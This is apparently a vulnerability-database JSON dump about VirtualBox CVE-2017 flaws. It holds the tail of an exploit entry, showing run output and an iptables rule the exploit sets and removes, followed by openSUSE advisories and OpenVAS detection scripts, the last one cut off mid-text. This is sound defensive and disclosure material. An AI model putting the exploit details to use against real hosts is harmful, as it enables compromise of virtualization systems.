0x7f56350fc5aa\r\nsend_udp_datashift(shift_amount=40, data_length=3092)\r\nsend_udp_datashift(shift_amount=36, data_length=3092)\r\nsending packet2, ip_off=0xa, ip_id=0x27\r\ndid that work?\r\nsystemf: <<<iptables -D OUTPUT -o enp0s3 -j DROP>>>\r\n==================================================================\r\n \r\nIf the exploit crashes, you'll have to remove the firewall rule the\r\nexploit added with `iptables -D OUTPUT -o {interface} -j DROP` inside\r\nthe VM to restore network connectivity.\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/27646", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-05-02T13:19:23", "bulletinFamily": "unix", "description": "This update for virtualbox to version 5.1.22 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n These non-security issues were fixed:\n\n - GUI: don't check if the Extension Pack is up-to-date if the user is\n about to install a new Extension Pack\n - GUI: fixed a possible crash when switching a multi-monitor VM into\n full-screen or seamless mode\n - GUI: several mini-toolbar fixes in full-screen / seamless mode\n - GUI: don't crash on restoring defaults in the appliance import dialog\n - ICH9: fix for Windows guests with a huge amount (more than 64G) of guest\n memory\n - BIOS: fixed El Torito hard disk emulation geometry calculation\n - VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru Meditation under certain\n conditions\n - Storage: fixed a potential hang under rare circumstances\n - Storage: fixed a potential crash under rare circumstances (asynchronous\n I/O disabled or during maintenance file operations like merging\n snapshots)\n - Linux hosts: make the ALSA backend work again as well as loading the GL\n libraries on certain hosts\n - Linux Additions: fixed mount.vboxsf symlink problem\n\n", "modified": "2017-05-02T15:09:19", "published": "2017-05-02T15:09:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00002.html", "id": "OPENSUSE-SU-2017:1142-1", "title": "Security update for virtualbox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-02T13:19:23", "bulletinFamily": "unix", "description": "This update to virtualbox 5.0.40 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox. These non-security issues were fixed:\n\n - Storage: fixed a potential hang under rare circumstances\n - Storage: fixed a potential crash under rare circumstances (asynchronous\n I/O disabled or during maintenance file operations like merging\n snapshots)\n - Storage: fixed a potential crash under rare circumstances (no\n asynchronous I/O or during maintenance file operations like merging\n snapshots)\n - Linux hosts: make the ALSA backend work again as well as Loading the GL\n libraries on certain hosts\n - GUI: don't crash on restoring defaults in the appliance import dialog\n\n", "modified": "2017-05-02T15:09:05", "published": "2017-05-02T15:09:05", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00001.html", "id": "OPENSUSE-SU-2017:1141-1", "title": "Security update for virtualbox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-07-17T14:19:34", "bulletinFamily": "scanner", "description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811010", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811010\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-25 15:14:16 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-05-03T00:00:00", "id": "OPENVAS:1361412562310851545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851545", "title": "SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_1142_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851545\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-03 06:46:21 +0200 (Wed, 03 May 2017)\");\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\",\n \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\",\n \"CVE-2017-3587\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'virtualbox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for virtualbox to version 5.1.22 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerabi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"virtualbox on openSUSE Leap 42.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1142_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-05-03T00:00:00", "id": "OPENVAS:1361412562310851546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851546", "title": "SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_1141_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851546\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-03 06:46:40 +0200 (Wed, 03 May 2017)\");\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\",\n \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\",\n \"CVE-2017-3587\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'virtualbox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update to virtualbox 5.0.40 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privilege ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"virtualbox on openSUSE Leap 42.1\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1141_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n 